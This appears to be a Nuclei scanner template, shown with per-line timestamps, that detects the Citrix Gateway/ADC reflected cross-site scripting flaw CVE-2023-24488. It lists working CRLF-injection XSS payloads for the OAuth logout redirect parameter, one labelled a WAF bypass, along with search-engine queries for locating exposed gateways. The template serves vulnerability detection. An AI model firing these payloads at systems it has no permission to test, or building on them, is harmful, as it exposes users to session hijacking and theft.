2023-06-30 17:58:56 +00:00
id : CVE-2023-24488
info :
name : Citrix Gateway and Citrix ADC - Cross-Site Scripting
2023-07-04 04:29:56 +00:00
author : johnk3r,DhiyaneshDk
2023-06-30 17:58:56 +00:00
severity : medium
description : |
Citrix ADC and Citrix Gateway versions before 13.1 and 13.1-45.61, 13.0 and 13.0-90.11, 12.1 and 12.1-65.35 contain a cross-site scripting vulnerability due to improper input validation.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the context of the user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 11:43:37 +00:00
remediation : |
Apply the necessary patches or updates provided by Citrix to mitigate this vulnerability.
2023-06-30 17:58:56 +00:00
reference :
- https://support.citrix.com/article/CTX477714/citrix-adc-and-citrix-gateway-security-bulletin-for-cve202324487-cve202324488
- https://blog.assetnote.io/2023/06/29/citrix-xss-advisory/
- https://nvd.nist.gov/vuln/detail/CVE-2023-24488
- https://twitter.com/infosec_au/status/1674786106381070342
2023-07-04 04:29:56 +00:00
- https://twitter.com/bxmbn/status/1675250259608449026
2023-06-30 17:58:56 +00:00
classification :
2023-07-11 19:49:27 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2023-06-30 17:58:56 +00:00
cvss-score : 6.1
cve-id : CVE-2023-24488
cwe-id : CWE-79
2024-05-31 19:23:20 +00:00
epss-score : 0.05227
epss-percentile : 0.93007
2023-09-06 11:43:37 +00:00
cpe : cpe:2.3:a:citrix:gateway:*:*:*:*:*:*:*:*
2023-06-30 17:58:56 +00:00
metadata :
2023-07-04 09:06:45 +00:00
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : citrix
product : gateway
2024-06-07 10:04:29 +00:00
shodan-query :
- title:"Citrix Gateway"
- http.title:"citrix gateway"
2024-05-31 19:23:20 +00:00
fofa-query : title="citrix gateway"
google-query : intitle:"citrix gateway"
2024-01-14 09:21:50 +00:00
tags : cve2023,cve,citrix,xss,adc
2023-06-30 17:58:56 +00:00
http :
- method : GET
path :
2023-07-04 04:29:56 +00:00
- '{{BaseURL}}/oauth/idp/logout?post_logout_redirect_uri=%0D%0A%0D%0A%3Cbody+x=%27&%27onload=%22(alert)(%27citrix+akamai+bypass%27)%22%3E'
2023-07-04 08:54:43 +00:00
- '{{BaseURL}}/oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a<script>alert(document.domain)</script>'
2023-06-30 17:58:56 +00:00
2023-07-04 08:54:43 +00:00
stop-at-first-match : true
2023-07-11 19:49:27 +00:00
2023-07-04 04:29:56 +00:00
matchers-condition : and
2023-06-30 17:58:56 +00:00
matchers :
2023-07-04 04:29:56 +00:00
- type : word
part : body
words :
- <body x='&'onload="(alert)('citrix akamai bypass')">
2023-07-04 08:54:43 +00:00
- <script>alert(document.domain)</script>
condition : or
- type : word
part : body
words :
2023-07-04 04:29:56 +00:00
- "Content-Type: text/html"
- type : status
status :
- 302
2024-06-08 16:02:17 +00:00
# digest: 4a0a004730450220519ea0a910a71d0468f28b45ba408d92479c6d9475f80f5ee3d78a14ef061fe6022100c829b535a3c80899d9e626fc41a95764714592bd8dc12ac540792c8a8c3f89d4:922c64590222798bb761d5b6d8e72950